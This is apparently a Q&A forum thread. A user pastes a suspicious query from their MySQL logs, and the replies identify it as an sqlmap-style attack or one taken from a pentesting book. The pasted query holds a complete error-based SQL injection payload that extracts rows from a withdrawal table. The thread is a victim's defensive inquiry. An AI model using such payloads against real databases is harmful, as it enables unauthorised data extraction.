# Mysql Injection query?

Tags: mysql

```
SELECT `u`.`login`,`u`.`fullname`,`ur`.`user_id`,`ur`.`refer_id` 
FROM 
`user_referrals` AS `ur` 
 JOIN 
(SELECT id,login,fullname FROM users WHERE id=4  
 AND 
(SELECT 3039 FROM 
(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT 
MID((IFNULL(CAST(id AS CHAR),0x20)),1,54) 
 FROM 
 cms_withdrawal WHERE user_id=3454 and timestamp>1494075125 LIMIT 
1,1),0x7176716271,FLOOR(RAND(0)*2))x 
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) AS `u`  
WHERE (ur.user_id=4135 AND ur.refer_id=4 AND (SELECT 3039 
FROM
(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT MID((IFNULL(CAST(id AS 
CHAR),0x20)),1,54) FROM cms_withdrawal WHERE user_id=3454 and 
timestamp>1494075125 LIMIT 1,1),0x7176716271,FLOOR(RAND(0)*2))x  
FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) OR (ur.refer_id=4135 AND 
ur.user_id=4 AND (SELECT 3039 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,
(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,54) 
FROM cms_withdrawal WHERE 
user_id=3454 and timestamp>1494075125 LIMIT 
1,1),0x7176716271,FLOOR(RAND(0)*2))x 
FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) AND ur.level=1 LIMIT 1
```

I see it in my mysql logs. What is that?

Answer (score 3):

That query is part of an sqlmap attack. Sqlmap is used for penetration-testing (hacking) purposes.

In this issue you can see that the code is part of what they use in their statements >> http://github.com/sqlmapproject/sqlmap/issues/209

sqlmap: http://github.com/sqlmapproject/sqlmap

Comment: This certainly looks like an attack, but it may not necessarily be using sqlmap.  For instance, the book _Mastering Kali Linux for Web Penetration Testing_ gives an example that contains a query like this [here](https://books.google.co.uk/books?id=Rng5DwAAQBAJ&pg=PA162&lpg=PA162&dq=INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x&source=bl&ots=4Q1ZCwYNBt&sig=q3w1ZtDJw8IcbYT3cm5eGCp9hP4&hl=en&sa=X&ved=2ahUKEwj5p7er5LzcAhWkAMAKHTljCeI4ChDoATAFegQIBRAB#v=onepage&q=INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x&f=false). So someone might have got it from a source other than sqlmap.